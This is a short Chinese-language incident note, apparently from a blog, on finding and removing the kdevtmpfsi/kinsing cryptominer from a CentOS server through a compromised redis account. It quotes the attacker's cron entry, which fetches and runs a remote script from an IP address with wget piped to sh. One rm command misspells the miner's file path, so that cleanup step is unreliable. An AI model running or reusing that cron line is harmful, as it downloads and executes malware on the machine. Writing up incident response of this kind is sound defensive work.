今天突然收到了服务器的报警信息,登录服务器通过 top 检查发现一个不认识的进程占用了大量的 CPU
[root@VM_5_22_centos cron]# top
top - 11:10:29 up 139 days, 2:54, 1 user, load average: 2.23, 2.19, 2.23
Tasks: 198 total, 1 running, 197 sleeping, 0 stopped, 0 zombie
%Cpu(s):100.0 us, 0.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 3880224 total, 138612 free, 2735260 used, 1006352 buff/cache
KiB Swap: 1048572 total, 899580 free, 148992 used. 903404 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
10237 redis 20 0 2721444 2.3g 980 S 193.8 61.8 11:35.54 kdevtmpfsi
起初的操作就是直接 kill 掉,但是 kill 掉后进程又自动启动,能自动启动应该有一个启动脚本在处理,先处理进程问题
[root@VM_5_22_centos cron]# systemctl status 10237
● session-351642.scope - Session 351642 of user redis
Loaded: loaded (/run/systemd/system/session-351642.scope; static; vendor preset: disabled)
Drop-In: /run/systemd/system/session-351642.scope.d
└─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
Active: active (abandoned) since Fri 2020-11-13 09:24:02 CST; 2 weeks 4 days ago
CGroup: /user.slice/user-1002.slice/session-351642.scope
├─ 5906 /var/tmp/kinsing
└─10237 /tmp/kdevtmpfsi
通过 systemct 找出这个进程相关信息,直接 kill 掉 5906 10237,同时删除文件
kill -9 5906
kill -9 10237
rm /var/tmp/kinsing -rf
rm /tmp/kedevtmpfsi -rf
这个进程的启动是通过 redis,那么需要检查 redis 用的 cron,直接查看 /var/spool/cron 目录下的文件
[root@VM_5_22_centos cron]# cat redis
* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
清空 redis 文件,完成异常处理